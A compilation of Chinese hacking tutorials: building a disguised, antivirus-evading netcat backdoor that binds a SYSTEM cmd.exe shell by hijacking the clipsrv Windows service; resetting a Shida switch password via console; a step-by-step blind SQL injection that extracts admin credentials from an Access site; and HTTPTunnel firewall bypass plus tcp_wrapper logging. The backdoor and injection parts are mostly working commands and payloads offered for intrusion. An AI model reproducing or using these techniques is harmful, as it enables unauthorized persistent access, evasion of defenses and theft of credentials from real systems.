黑客实战之攻击篇——用NC打造成自己的简单后门
大家都知道nc是一個(gè)強(qiáng)大并且靈活的黑客工具,用他可以做很多事情,譬如做為telnet的客戶端口,譬如入侵的時(shí)候反彈回來(lái)shell,譬如掃描……但是你有沒(méi)有想過(guò)將他打造成一個(gè)服務(wù)級(jí)的后門(mén)呢?現(xiàn)在好多跟我一樣的菜鳥(niǎo)還不懂得編程,別人寫(xiě)的流行點(diǎn)的后門(mén)又經(jīng)常被殺,那就跟我一起來(lái)自己手工制作一個(gè)后門(mén)吧,不需要任何編程知識(shí)菜鳥(niǎo)級(jí)的東東哦。
首先請(qǐng)準(zhǔn)備好不被殺的nc.exe(隨便加個(gè)殼就可以了的),還有sc.exe(這個(gè)是操作服務(wù)的一個(gè)小工具,被人稱(chēng)為操作服務(wù)的軍刀),這些就可以打造我們自己的后門(mén)了,后門(mén)的要求我想不需要很強(qiáng)的操作功能,只需要當(dāng)我們連接的時(shí)候獲得一個(gè)system權(quán)限的shell就可以了,有了cmdshell做什么不可以呢。如果你需要反彈的后門(mén),也可以做到,自己注冊(cè)個(gè)域名就可以用nc反彈了,因?yàn)楸容^復(fù)雜這里就不說(shuō)了。我們知道nc就是實(shí)現(xiàn)我們的后門(mén)功能的最經(jīng)典的工具,我們來(lái)看看nc的幫助,命令行下輸入nc -h就可以看到,我們主要用到的幾個(gè)參數(shù)如下:
-e 綁定一個(gè)程序并且連接時(shí)執(zhí)行
-l 非法詞模式
-p 指定nc要運(yùn)行的本地端口
-L 增強(qiáng)了的非法詞模式,當(dāng)連接斷開(kāi)時(shí)再次非法詞
至于其他的用法相信各位已經(jīng)很了解了的,我們以前經(jīng)常用到的是
nc -l -e cmd.exe -p 8888 非法詞8888端口,當(dāng)有連接時(shí)重定向到cmd.exe實(shí)現(xiàn)綁定一個(gè)shell
這樣的形式用serveru等溢出程序執(zhí)行后來(lái)綁定一個(gè)可以得到shell的端口8888,我們telnet或者nc連接上來(lái)的時(shí)候就可以直接獲得一個(gè)shell。但是這樣連接斷開(kāi)之后非法詞的端口就會(huì)關(guān)閉,是一次性的,不能再次獲得shell,這樣當(dāng)然不適合于做后門(mén)了。后來(lái)發(fā)現(xiàn)nc的這個(gè)參數(shù)L可以一直保持非法詞的狀態(tài),可以反復(fù)連接。用
nc -L -e cmd.exe -p 8888 也是綁定的,不過(guò)加強(qiáng)了的
這樣的命令就已經(jīng)達(dá)到我們的目的了,但是我們往往是在溢出的shell里工作,留后門(mén)是為了以后的進(jìn)入,那我們?nèi)绾伪WCnc再機(jī)器重起之后還可以工作從而實(shí)現(xiàn)我們的后門(mén)的目的呢?你可以把他放到注冊(cè)表的Run等啟動(dòng)項(xiàng)下面,但是感覺(jué)那樣不是太好,有些地方已經(jīng)被殺毒軟件盯上了,把我的后門(mén)放到那里實(shí)在不是很放心,后來(lái)想到干脆作成服務(wù)吧!隨著系統(tǒng)啟動(dòng)而啟動(dòng),呵呵。那就看看如何打造服務(wù)吧!
首先我們將nc.exe放到%systemroot%system32下面,起名叫svch0st.exe或者放到%systemroot%system下面更名叫svchost.exe,這樣的目的是為了在任務(wù)管理器里看不出異樣。然后用sc替換系統(tǒng)的服務(wù),不用改別的,只要修改他的執(zhí)行路徑就可以了,我們就改那個(gè)clipsrv.exe服務(wù)吧!命令如下:
sc config clipsrv start= auto 將clipsrv.exe服務(wù)設(shè)置為自動(dòng)
sc config clipsrv binpath= "c:winntsystem32svch0st.exe -L -e cmd.exe -p 8888" 設(shè)置clipsrv.exe服務(wù)的啟動(dòng)路徑為我們的nc
sc start clipsrv 啟動(dòng)clipsrv.exe服務(wù)
嘿嘿,但是看看結(jié)果吧!看看服務(wù)里的顯示信息,如圖一,很顯眼哦!不管,先啟動(dòng)服務(wù)然后
netstat -an find "8888" etstat -an的結(jié)果中查找8888看我們的程序是否運(yùn)行
的確是已經(jīng)被打開(kāi)了,但是當(dāng)顯示服務(wù)沒(méi)有響應(yīng)的時(shí)候nc的進(jìn)程被結(jié)束了,這是Windows服務(wù)管理機(jī)制吧。不是很成功呵,我們繼續(xù)改造!不懂編程的我們這個(gè)時(shí)候就會(huì)很郁悶,因?yàn)椴荒茏尫?wù)停止響應(yīng)的時(shí)候我開(kāi)始想用bat2exe.exe,但是啟動(dòng)服務(wù)的時(shí)候總是出現(xiàn)拒絕訪問(wèn)的錯(cuò)誤,大概是bat2exe出來(lái)的exe文件不被系統(tǒng)服務(wù)格式所支持,只能想其他的辦法了,于是我想到了用Winrar.exe來(lái)做我們自己的exe文件,這總該被服務(wù)的可執(zhí)行文件支持吧!至于如何實(shí)現(xiàn)編程里的子進(jìn)程在父進(jìn)程終止后仍然可以在內(nèi)存中運(yùn)行,我用的方法是寫(xiě)個(gè)run.vbs然后用cscript.exe來(lái)調(diào)用,至于如何調(diào)用就可以在自解壓格式里設(shè)置解壓后運(yùn)行cscript.exe run.vbs,如圖三。其中Run.vbs里的內(nèi)容如下:
dim sh 定義變量
set sh=createobject("wscript.shell") 取得WSH對(duì)象
sh.run "nc -L -e cmd.exe -p 8888",0 執(zhí)行我們的程序并隱藏錯(cuò)誤
而自解壓的路徑寫(xiě)上%systemroot%system32,這樣我們自解壓服務(wù)程序就做好了,保存為c1ipsrv.exe(不好意思,還是用那個(gè)1和l的把戲),放到c:winntsystem32目錄下面。現(xiàn)在修改我們的clipsrv剪切薄服務(wù)的具體路徑為c:winntsystem32c1ipsrv.exe,命令如下:
sc stop clipsrv 將clipsrv.exe服務(wù)設(shè)置為自動(dòng)
sc config clipsrv start= auto
sc config clipsrv binpath= "c:winntsystem32c1ipsrv.exe" 設(shè)置clipsrv.exe服務(wù)的啟動(dòng)路徑為我們的nc
sc start clipsrv 啟動(dòng)clipsrv.exe服務(wù)
現(xiàn)在一切OK了,這樣以來(lái)我們的程序的參數(shù)細(xì)節(jié)還會(huì)被屏蔽,比開(kāi)始的參數(shù)直接放到執(zhí)行文件路徑里好多了。我們來(lái)實(shí)驗(yàn)下。先net start clipsrv,然后netstat -an find "8888"看看開(kāi)沒(méi)開(kāi)8888端口,最后用nc 127.0.0.1 8888連接上去得到shell了呵!如圖四。好了,快去體驗(yàn)自己動(dòng)手的快樂(lè)哦,你還可以作其他的事情,只要你的服務(wù)的程序做的夠好,甚至可以用反向回來(lái)的nc,具體我就不寫(xiě)了。
本文是我看了韓的一個(gè)動(dòng)畫(huà)之后想到的,后來(lái)自己想到完全可以將nc改成后門(mén)的,不過(guò)也還是有很大的缺陷,畢竟不是編程,因?yàn)椴荒芊祷匦畔⒔o服務(wù)控制器,會(huì)在日志里留一些錯(cuò)誤,不過(guò),有多少人去在意這些錯(cuò)誤呢?還有就是沒(méi)有身份驗(yàn)證功能,不過(guò)端口可以自定義不知道算不算一個(gè)身份驗(yàn)證。
?
一,網(wǎng)絡(luò)環(huán)境:
公司使用實(shí)達(dá)的3500系列(具體型號(hào)是3548)交換機(jī),在交換機(jī)上面連接了一臺(tái)華為2621路由器,通過(guò)電信的光纖上網(wǎng)。實(shí)際情況這臺(tái)實(shí)達(dá)3548交換機(jī)被以前的網(wǎng)絡(luò)管理員設(shè)置了密碼而沒(méi)有告訴我。所以破解他的密碼成為本篇文章的核心。
二,準(zhǔn)備工作:
由于整個(gè)工作需要斷網(wǎng),畢竟涉及到重新啟動(dòng)交換機(jī)等操作,所以選擇時(shí)間在工作下班后的晚上23點(diǎn)。另外由于破解密碼這類(lèi)操作都必須使用CONSOLE控制臺(tái)線來(lái)設(shè)置,所以地點(diǎn)只能是中心機(jī)房。筆者找到了實(shí)達(dá)3548設(shè)備的所有相關(guān)工具,包括安裝說(shuō)明與CONSOLE控制線等。
三,實(shí)戰(zhàn)破解密碼:
根據(jù)筆者以往經(jīng)驗(yàn)實(shí)達(dá)所有設(shè)備的使用和操作命令語(yǔ)句都應(yīng)該和CISCO設(shè)備類(lèi)似,所以原本以為按照破解CISCO設(shè)備密碼的步驟就可以輕松搞定。誰(shuí)知道一上手才發(fā)現(xiàn)原來(lái)差別還真不小。一般來(lái)說(shuō)CISCO設(shè)備都是通過(guò)修改配置寄存器configuration register來(lái)實(shí)現(xiàn)破解密碼的操作。在實(shí)達(dá)交換機(jī)中根本不存在配置寄存器configuration register這個(gè)概念。通過(guò)查詢(xún)資料才發(fā)現(xiàn),原來(lái)實(shí)達(dá)交換機(jī)是使用修改超級(jí)終端配置的方法來(lái)破解密碼的。
第一步:將實(shí)達(dá)交換機(jī)的配套CONSOLE控制線連接到設(shè)備的CONSOLE管理接口。
第二步:將CONSOLE控制線的另一斷連接到網(wǎng)絡(luò)管理員調(diào)試使用的筆記本的COM串口上。
第三步:進(jìn)入筆記本系統(tǒng)桌面,點(diǎn)“開(kāi)始->所有程序->附件->通訊->超級(jí)終端”。
第四步:啟動(dòng)系統(tǒng)的超級(jí)終端后我們隨便為新建立的連接起一個(gè)名字。
第五步:在連接設(shè)置處的“連接時(shí)使用”地方通過(guò)下拉菜單選擇剛剛使用CONSOLE控制線連接的端口。例如COM1口。
第六步:在COM1屬性設(shè)置窗口中我們對(duì)連接的參數(shù)進(jìn)行配置。一般來(lái)說(shuō)我們正常連接交換機(jī)應(yīng)該采用每秒位數(shù)9600,數(shù)據(jù)位為8,奇偶校驗(yàn)是無(wú),停止位是1,數(shù)據(jù)流控制是無(wú)。不過(guò)要是想破解實(shí)達(dá)交換機(jī)的密碼的話就需要修改這些數(shù)值。將PC超級(jí)終端串口速率設(shè)成57600,其他和上面寫(xiě)的相同即可。
第七步:使用終端連接到交換機(jī)后,再打開(kāi)交換機(jī)的電源,在交換機(jī)啟動(dòng)后進(jìn)行自檢時(shí)立即按下“ESC”鍵多次進(jìn)入交換機(jī)的監(jiān)控模式。終端界面將出現(xiàn)多個(gè)選項(xiàng),包括一些基本的初始化設(shè)置。
小提示:
剛開(kāi)始筆者按照第七步的步驟嘗試并沒(méi)有成功,超級(jí)終端界面總是顯示很多個(gè)“。。。。。”。后來(lái)才發(fā)現(xiàn)原來(lái)交換機(jī)必須在超級(jí)終端連接后才能加電啟動(dòng),如果先開(kāi)交換機(jī)再用超級(jí)終端連接的話則無(wú)法進(jìn)入監(jiān)控模式。
第八步:根據(jù)菜單提示,將配置文件config.text上傳(Upload)至網(wǎng)絡(luò)管理員使用的筆記本,然后刪除交換機(jī)上的配置文件Config.text。
第九步:在筆記本上打開(kāi)剛下載的保存在系統(tǒng)硬盤(pán)中的config.text文件,將以下語(yǔ)句
enable secret level 1 5 !E,1u_;C9&-8U0H
enable secret level 15 5 *r_1u_;C3vW8U0H
刪除然后保存退出。
第十步:根據(jù)交換機(jī)監(jiān)控模式的提示,將筆記本上修改的config.text再下載(Download)到交換機(jī)中。
第十一步:重新將筆記本的超級(jí)終端串口速率設(shè)成9600,其他保持默認(rèn)參數(shù)。交換機(jī)加電重啟后,進(jìn)入交換機(jī)配置界面,你就會(huì)發(fā)現(xiàn)我們可以重新配置交換機(jī)的密碼了,包括遠(yuǎn)程TELNET的管理密碼以及本機(jī)的特權(quán)密碼。此后交換機(jī)的密碼也將變成你剛剛配置的,而其它配置則保留不變,并不會(huì)影響任何使用。
小提示:
在實(shí)際使用中筆者發(fā)現(xiàn)使用實(shí)達(dá)3550交換機(jī)的監(jiān)控模式中的上傳和下載文件功能并不穩(wěn)定,經(jīng)常出現(xiàn)傳輸失敗的提示。所以筆者索性直接在監(jiān)控模式中將config.text刪除,然后重新啟動(dòng)交換機(jī)重新配置所有交換機(jī)信息。這種情況適用于交換機(jī)自身配置不多也不復(fù)雜,另外網(wǎng)絡(luò)管理員也需要對(duì)設(shè)置語(yǔ)句比較熟悉。
總結(jié):
經(jīng)過(guò)本次實(shí)戰(zhàn)破解交換機(jī)密碼的操作,筆者再次明白了對(duì)于路由交換設(shè)備來(lái)說(shuō),不同廠商操作程序和步驟絕對(duì)是不同的,即使命令語(yǔ)句類(lèi)似但是在其他高級(jí)操作上還是大相徑庭的。因此本篇文章介紹的所有內(nèi)容僅僅是針對(duì)實(shí)達(dá)路由器與交換機(jī),如果你遇到的是其他設(shè)備則需要采取其他的方法來(lái)解決。 SQL注入漏洞初級(jí)應(yīng)用之Access篇 如果你已經(jīng)掌握了SQL注入漏洞的一些相關(guān)的基礎(chǔ)知識(shí),那是不是覺(jué)得看了理論有一種想急于知道如何實(shí)際動(dòng)手操作的沖動(dòng),好吧,Let’s go,這篇文章我們就來(lái)實(shí)戰(zhàn)SQL注入,不過(guò)針對(duì)網(wǎng)站的數(shù)據(jù)庫(kù)是ACCESS的,畢竟在國(guó)內(nèi)都是用虛擬機(jī),一般只有FTP上傳權(quán)限,所以還是很有市場(chǎng)的。
首先要注意的是,如果你以前沒(méi)試過(guò)SQL注入的話,那么第一步先把IE菜單=>工具=>Internet選項(xiàng)=>高級(jí)=>顯示友好 HTTP 錯(cuò)誤信息前面的勾去掉。否則,不論服務(wù)器返回什么錯(cuò)誤,IE都只顯示為HTTP 500服務(wù)器錯(cuò)誤,不能獲得更多的提示信息。
1.入侵測(cè)試目標(biāo):
前不久我們學(xué)校的一個(gè)同學(xué)做了個(gè)網(wǎng)站,做的還挺漂亮的,叫我去看下,我順便對(duì)它進(jìn)行了一次安全檢測(cè)。文章發(fā)表前已經(jīng)征得該同學(xué)的同意,請(qǐng)不要效仿。下面的真實(shí)網(wǎng)址已經(jīng)被我屏蔽。
測(cè)試網(wǎng)站:http://www.xxx.com/index.asp
2.尋找可能的SQL注入點(diǎn)
我們知道,一般的文章管理系統(tǒng),下載系統(tǒng),論壇,留言本,相冊(cè)等都會(huì)有個(gè)show.asp?id= list.asp?id= news.asp?id= 什么的,其實(shí)一看就知道是調(diào)用SQL語(yǔ)句查詢(xún)數(shù)據(jù)庫(kù)并顯示出來(lái)。我們不難發(fā)現(xiàn)這個(gè)站的新聞系統(tǒng)就是show.asp?id=的形式,隨便點(diǎn)一個(gè)鏈接得到地址如下:
http://www.xxx.com/show.asp?id=474
從這個(gè)地址就知道是通過(guò)show.asp執(zhí)行SQL語(yǔ)句訪問(wèn)數(shù)據(jù)庫(kù),可想而知,SQL語(yǔ)句原貌大致如下:
select * from 表名 where 字段=xx,如果這個(gè)show.asp對(duì)后面的id整型參數(shù)過(guò)濾好的話,就可能存在SQL注入漏洞。
3.判斷SQL注入是否存在
通過(guò)上面的分析知道,要判斷有沒(méi)有SQL注入漏洞,就得看show.asp有沒(méi)對(duì)參數(shù)過(guò)濾好,所以可以用以下步驟測(cè)試SQL注入是否存在。
a.最簡(jiǎn)單的判斷方法
在要檢測(cè)的網(wǎng)址后面加一個(gè)單引號(hào):http://www.xxx.com /show.asp?id=474’
此時(shí)show.asp中的SQL語(yǔ)句變成了:select * from 表名 where 字段=xx’,如果程序沒(méi)有過(guò)濾好“’”的話,就會(huì)提示 show.asp運(yùn)行異常;但這樣的方法雖然很簡(jiǎn)單,但并不是最好的,因?yàn)?#xff1a;
第一:不一定每臺(tái)服務(wù)器的IIS都返回具體錯(cuò)誤提示給客戶端,如果程序中加了cint(參數(shù))之類(lèi)語(yǔ)句的話,SQL注入是不會(huì)成功的,但服務(wù)器同樣會(huì)報(bào)錯(cuò),具體提示信息為處理 URL 時(shí)服務(wù)器上出錯(cuò)。請(qǐng)和系統(tǒng)管理員聯(lián)絡(luò)。
第二:由于以前存在過(guò)的1’ or ‘1’=’1漏洞,所以目前大多數(shù)程序員已經(jīng)將“’“ 過(guò)濾掉,所以用" '"測(cè)試不到注入點(diǎn),所以一般使用經(jīng)典的1=1和1=2測(cè)試方法,如下:
http://www.xxx.com /show.asp?id=474 and 1=1, show.asp運(yùn)行正常,而且與http://www.xxx.com /show.asp?id=474運(yùn)行結(jié)果相同,如圖1:
[attachment=1259]
http://ww.xxx.com /show.asp?id=474 and 1=2, show.asp運(yùn)行異常,(這就是經(jīng)典的 1=1 1=2 判斷方法)如圖2:
[attachment=1260]
這里很明顯當(dāng)加 and 1=1 的時(shí)候返回完全正常的頁(yè)面,加 and 1=2 顯示:暫時(shí)還沒(méi)有文章!
到這里基本上可以斷定他存在SQL注入,至于能不能注出賬號(hào)密碼來(lái),還需要更進(jìn)一步的注入測(cè)試,這里只能得到SQL注入點(diǎn): http://www.xxx.com/show.asp?id=474
4.判斷表是否存在
國(guó)內(nèi)的一般程序員在設(shè)計(jì)數(shù)據(jù)庫(kù)的時(shí)候都會(huì)用一些特定的做為表名,字段名什么的。比如說(shuō)后臺(tái)管理員一般放在表admin里面,而注冊(cè)的用戶放在表users里,當(dāng)然,只是一般,依照各程序的不同而不同。
這個(gè)站是我同學(xué)自己寫(xiě)的,我還是先判斷管理員表admin是否存在,在后面加上語(yǔ)句:and exists (select * from admin)變成http://www.xxx.com/show.asp?id=474 and exists (select * from admin)提交訪問(wèn)后返回的頁(yè)面如圖3:
[attachment=1261]
這就說(shuō)明我猜的admin表名不存在,繼續(xù)猜另外的名字,這里可以參考國(guó)內(nèi)常見(jiàn)的程序的表名,比如:admin user vote manage users 會(huì)員 用戶 管理員 admin_admin userinfo bbs news system等,這個(gè)站我最后猜到的是:users,語(yǔ)句:and exists (select * from users)。
5.進(jìn)一步判斷表里的字段是否存在
判斷字段id 是否存在,這個(gè)一般都有,自動(dòng)編號(hào)。如果存在了順便猜一下管理員的id值。
判斷存在語(yǔ)句:and exists(select id from users)
判斷編號(hào)語(yǔ)句:and exists(select id from users where id=1)
一般管理員賬號(hào)密碼放在第一位,也就是id=1,如果不是就猜下去,猜id=2 猜id=3等啦。
由于這個(gè)站是自己寫(xiě)的代碼,所以會(huì)有點(diǎn)不同,當(dāng)判斷是否不過(guò)你可以猜到他的對(duì)應(yīng)的可能是userid,因?yàn)樗砻∽鰑ser呀,把上面的id改為userid就返回了正常的頁(yè)面,如圖4:
[attachment=1262]
至于這個(gè)userid值為多少,同樣猜,and exists(select userid where userid=1)改變1這個(gè)數(shù)字,一直猜到頁(yè)面顯示正常為止。這里我猜到的是userid=11,如圖5:
[attachment=1263]
最后猜出這個(gè)繼續(xù)猜出其它的字段,用戶名字段最后為username,密碼字段為userpwd,用到的語(yǔ)句分別為:and exists (select username from users)和and exists (select userpwd from users),這里就不抓圖了。
6.再進(jìn)一步判斷賬號(hào)和密碼的長(zhǎng)度
這里我說(shuō)一下常用的方法,判斷的時(shí)候大于小于一起用嘛,學(xué)過(guò)數(shù)據(jù)結(jié)構(gòu)的人都知道有二分法,我這里也引用一下,比如說(shuō)你判斷 >4 而又判斷<12 那我接下來(lái)就取中間的看是大于8還是小于8,如果是大于8則說(shuō)明在8到12之間,如果是小于8說(shuō)明在4到8之間,再接著用二分法判斷下去。。。。。。當(dāng)然由于賬號(hào)密碼一般人不會(huì)太長(zhǎng),所以在這里二分法的優(yōu)勢(shì)體現(xiàn)的不夠明顯,不過(guò)到下面猜賬號(hào)密碼字符的時(shí)候就能明顯感受到了。
首先判斷賬號(hào)username的字符長(zhǎng)度:and exists (select userid from users where len(username)<10 and userid=11),返回正常說(shuō)明長(zhǎng)度小于10,and exists (select userid from users where len(username)>5 and userid=11),返回不正常說(shuō)明長(zhǎng)度小于5,最后猜到的是
and exists (select userid from users where len(username)=4 and userid=11),說(shuō)明賬號(hào)的長(zhǎng)度為4,也太短了吧,呵呵,別高興的太早,如圖6:
[attachment=1264]
再接下來(lái)猜密碼長(zhǎng)度,與猜解賬號(hào)長(zhǎng)度類(lèi)似,最后猜到密碼長(zhǎng)度為16位,語(yǔ)句:and exists (select userid from users where len(userpwd)=16 and userid=11),不過(guò)我要提醒的是,一般遇到16位或者32位的密碼,我都會(huì)想到MD5加密,當(dāng)然可以暴力破解。
到此,我們得到的信息如下:
賬號(hào)username長(zhǎng)度:4
密碼userpwd長(zhǎng)度:16
7.猜解賬號(hào)密碼字符
在這里的猜解要用到asc(mid())這個(gè)函數(shù)。前面基礎(chǔ)篇我們已經(jīng)講過(guò)這些函數(shù)了,我這里稍提一下。asc()是把字符轉(zhuǎn)換為其對(duì)應(yīng)的ASC碼,mid()則是定位字符串里的字符。
格式:mid(字符串,開(kāi)始位置,子串長(zhǎng)度)
比如說(shuō)mid(name,1,1)即取name字符串里第一個(gè)字符。如果這里的name等于xysky 則mid(name,1,1)=x而mid(name,1,2)則取y
這兩個(gè)函數(shù)結(jié)合asc(mid())則是先定位字符串里的字符再取其ASC碼,比如asc(mid(username,2,1))則是判斷username字符串里的第二位的ASC碼,在SQL注入里常用它,有漢字也不用怕,不過(guò)遇上了漢字確實(shí)有點(diǎn)郁悶,中文字符的asc值小于0的。在后面加上如下的語(yǔ)句:
and 11=(select userid from users where asc(mid(username,1,1))<0) 返回正常,說(shuō)明賬號(hào)果然是漢字,下面的事就不那么容易了。下面我們用到二分法的思想開(kāi)始猜解第一位字符:
and 11=(select userid from users where asc(mid(username,1,1))<-19000) 返回正常
and 11=(select userid from users where asc(mid(username,1,1))>-20000) 返回正常
以上說(shuō)明賬號(hào)的第一個(gè)字符的ASCII碼在-19000和-20000之間,再用二分法猜解下去,最后的第一個(gè)為:-19765
and 11=(select userid from users where asc(mid(username,1,1))= -19765)
ASCII碼為-19765對(duì)應(yīng)的字符就是:菜
下面接著猜第二個(gè)字符,最后語(yǔ)法為:and 11=(select userid from users where asc(mid(username,2,1))=-15119),這里抓個(gè)圖,如圖7:
[attachment=1265]
對(duì)應(yīng)字符為:鳥(niǎo)
到這里我想其它不用猜了,因?yàn)檫@個(gè)網(wǎng)站上的信息已經(jīng)告訴我們了:
作者:菜鳥(niǎo)老師 票數(shù):0等級(jí):點(diǎn)擊:308 呵呵,如果沒(méi)錯(cuò)的話就是它了。
接著猜密碼,依然二分法,就不抓圖了:
and 11=(select userid from users where asc(mid(userpwd,1,1))<50)
and 11=(select userid from users where asc(mid(userpwd,1,1))>40)
最后得到的為:48 對(duì)應(yīng)的字符就是0
依此下去,最后得到加密后的MD5值為:00d60a849c6c381e ,由于MD5目前沒(méi)有好的破解方法,只能暴力破解,我們就此打此。
8.后臺(tái)的猜解
經(jīng)過(guò)前面辛苦的猜解,我們已經(jīng)得到這個(gè)網(wǎng)站的賬號(hào)密碼了,當(dāng)然這里已經(jīng)是MD5加密了,我們只是說(shuō)一下常規(guī)的SQL注入攻擊中的一步,往往也是最為關(guān)鍵的一步:尋找網(wǎng)站管理后臺(tái)。像這樣動(dòng)態(tài)生成頁(yè)面的網(wǎng)站,一般都會(huì)有個(gè)管理后臺(tái)的,添加文章編輯文章修改文章刪除文章什么的,而一般的程序員在命名后臺(tái)的時(shí)候往往是:admin_index.asp admin_login.asp admin.asp admin/admin_index.asp admin/admin_login.asp,當(dāng)然還有退出后臺(tái)的文件:logout.asp admin_logout.asp admin/admin_logout.asp等。一個(gè)一個(gè)的訪問(wèn),結(jié)果嘛,我只能說(shuō)靠運(yùn)氣加上你的經(jīng)驗(yàn)了。以這個(gè)站為例,前面那些登錄的我一個(gè)也沒(méi)猜到,因?yàn)槲也碌接衋dmin這個(gè)目錄,我就一直以為登錄的頁(yè)面也在admin目錄,猜了好久,最后無(wú)意訪問(wèn)admin/logout.asp,頁(yè)面居然自動(dòng)轉(zhuǎn)到后臺(tái)登錄頁(yè)面了,居然是上一級(jí)目錄的login.asp,我狂汗,如圖8:
[attachment=1266]
有了后臺(tái),有了賬號(hào)密碼(當(dāng)然這個(gè)站是MD5加密的密碼,我也懶得破解),你就可以進(jìn)后臺(tái)了,至于進(jìn)后臺(tái)你能做什么,就看后臺(tái)的功能與你的技術(shù)了,你想做什么,就依靠你自己了,本文只演示SQL注入漏洞最基本的注入,想深入研究的朋友一定要好好掌握哦! Linux下的后門(mén)和日志工具 攻入Linux系統(tǒng)后,很多入侵者往往就開(kāi)始得意忘形了。這其中還有一個(gè)原因,就是技術(shù)性也要求更高了。下面,我們來(lái)看看一些常用的經(jīng)典工具。
1、從這里延伸:后門(mén)和連接工具
(1)Httptunnel
Tunnel的意思是隧道,通常HTTPTunnel被稱(chēng)之為HTTP暗道,它的原理就是將數(shù)據(jù)偽裝成HTTP的數(shù)據(jù)形式來(lái)穿過(guò)防火墻,實(shí)際上,它是在HTTP請(qǐng)求中創(chuàng)建了一個(gè)雙向的虛擬數(shù)據(jù)連接來(lái)穿透防火墻。說(shuō)得簡(jiǎn)單點(diǎn),就是說(shuō)在防火墻兩邊都設(shè)立一個(gè)轉(zhuǎn)換程序,將原來(lái)需要發(fā)送或接受的數(shù)據(jù)包封裝成HTTP請(qǐng)求的格式騙過(guò)防火墻,所以它不需要?jiǎng)e的代理服務(wù)器而直接穿透防火墻。
HTTPTunnel包括兩個(gè)程序:htc和hts,其中htc是客戶端,而hts是服務(wù)器端,我們現(xiàn)在來(lái)看看我是如何用它們的。比如開(kāi)了FTP的機(jī)器的IP是192.168.10.231,本地機(jī)器IP是192.168.10.226,因?yàn)榉阑饓Φ脑?#xff0c;本地機(jī)器無(wú)法連接到FTP上。怎么辦?現(xiàn)在就可以考慮使用HTTPTunnel了。過(guò)程如下:
第一步:在本地機(jī)器上啟動(dòng)HTTPTunnel客戶端。用Netstat看一下本機(jī)現(xiàn)在開(kāi)放的端口,會(huì)發(fā)現(xiàn)8888端口已在偵聽(tīng)。
第二步:在對(duì)方機(jī)器上啟動(dòng)HTTPTunnel的服務(wù)器端,并執(zhí)行命令“hts -f localhost:21 80”,這個(gè)命令的意思是說(shuō),把本機(jī)的21端口發(fā)出去的數(shù)據(jù)全部通過(guò)80端口中轉(zhuǎn)一下,并且開(kāi)放80端口作為偵聽(tīng)端口,再用Neststat看一下他的機(jī)器,就會(huì)發(fā)現(xiàn)80端口現(xiàn)在也在偵聽(tīng)狀態(tài)。
第三步:在本地機(jī)器上用FTP連接本機(jī)的8888端口,會(huì)發(fā)現(xiàn)已經(jīng)連上對(duì)方的機(jī)器了。那么,為什么人家看到的是127.0.0.1,而不是192.168.10.231呢?因?yàn)槲覀儸F(xiàn)在是連接本機(jī)的8888端口,防火墻肯定不會(huì)有反應(yīng),如果沒(méi)往外發(fā)包,局域網(wǎng)的防火墻肯定就不知道了。現(xiàn)在連接上本機(jī)的8888端口以后,FTP的數(shù)據(jù)包不管是控制信息還是數(shù)據(jù)信息,都被htc偽裝成HTTP數(shù)據(jù)包然后發(fā)過(guò)去,在防火墻看來(lái),這都是正常數(shù)據(jù),相當(dāng)于欺騙了防火墻。
需要說(shuō)明的是,這一招的使用需要其他機(jī)器的配合,就是說(shuō)要在他的機(jī)器上啟動(dòng)一個(gè)hts,把他所提供的服務(wù),如FTP等重定向到防火墻所允許的80端口上,這樣才可以成功繞過(guò)防火墻!肯定有人會(huì)問(wèn),如果對(duì)方的機(jī)器上本身就有WWW服務(wù),也就是說(shuō)他的80端口在偵聽(tīng),這么做會(huì)不會(huì)沖突?HTTPTunnel的優(yōu)點(diǎn)就在于,即使他的機(jī)器以前80端口開(kāi)著,現(xiàn)在也不會(huì)出現(xiàn)什么問(wèn)題,重定向的隧道服務(wù)將暢通無(wú)阻!
(2)Tcp_wrapper
Tcp_wrapper是Wietse Venema開(kāi)發(fā)的一個(gè)免費(fèi)軟件。Tcp_wrapper的誕生有個(gè)小小的故事,大約1990年,作者所在大學(xué)的服務(wù)器屢屢受到一個(gè)外來(lái)黑客侵入,因?yàn)槭芎χ鳈C(jī)的硬盤(pán)數(shù)據(jù)屢次被rm -rf/命令整個(gè)抹掉,所以找尋線索極為困難,直到有一天晚上作者在工作的過(guò)程中無(wú)意中發(fā)現(xiàn)這個(gè)黑客在不斷的finger 受害主機(jī)、偷窺受害者的工作。于是,一個(gè)想法誕生了:設(shè)計(jì)一個(gè)軟件,使它可以截獲發(fā)起finger請(qǐng)求的IP,用戶名等資料。Venema很快投入了工作,而Tcp_wrapper也由此誕生!此后,Tcp_wrapper隨著廣泛的應(yīng)用逐漸成為一種標(biāo)準(zhǔn)的安全工具。通過(guò)它,管理員實(shí)現(xiàn)了對(duì)inetd提供的各種服務(wù)進(jìn)行監(jiān)控和過(guò)濾。
Tcp_wrapper編譯安裝成功后,會(huì)生成一個(gè)tcpd程序,它可以在inetd.conf這個(gè)控制文件中取代in.telnetd的位置,這樣,每當(dāng)有telnet的連接請(qǐng)求時(shí),tcpd即會(huì)截獲請(qǐng)求,先讀取管理員所設(shè)置的訪問(wèn)控制文件,合乎要求,則會(huì)把這次連接原封不動(dòng)的轉(zhuǎn)給真正的in.telnetd程序,由in.telnetd完成后續(xù)工作。如果這次連接發(fā)起的ip不符合訪問(wèn)控制文件中的設(shè)置,則會(huì)中斷連接請(qǐng)求,拒絕提供telnet服務(wù)。Tcp_wrapper訪問(wèn)控制的實(shí)現(xiàn)是依靠?jī)蓚€(gè)文件:hosts.allow,hosts.deny來(lái)實(shí)現(xiàn)的。如果我們編輯/etc/syslog.conf文件時(shí),加入了日志紀(jì)錄功能,即:
#tcp wrapper log
local3.info /var/log/tcplog
編輯結(jié)束后,保存文件,在/var/log下會(huì)生成tcplog文件,注意這個(gè)文件的讀寫(xiě)屬性, 應(yīng)該只對(duì)root有讀寫(xiě)權(quán)限。然后ps -ef grep syslogd,找出syslogd的進(jìn)程號(hào),kill -HUP 重啟syslogd進(jìn)程使改動(dòng)生效。 在這里,我們可以預(yù)先看一看以后生成的tcplog文件內(nèi)容,如下:
[tr=#ffffff][td]Jul 31 22:00:52 www.test.org in.telnetd[4365]: connect from 10.68.32.1
Jul 31 22:02:10 www.test.org in.telnetd[4389]: connect from 10.68.32.5
Jul 31 22:04:58 www.test.org in.ftpd[4429]: connect from 10.68.32.3
Aug 2 02:11:07 www.test.org in.rshd[13660]: connect from 10.68.32.5
Aug 2 02:11:07 www.test.org in.rlogind[13659]: connect from 10.68.32.1[/td][/tr]
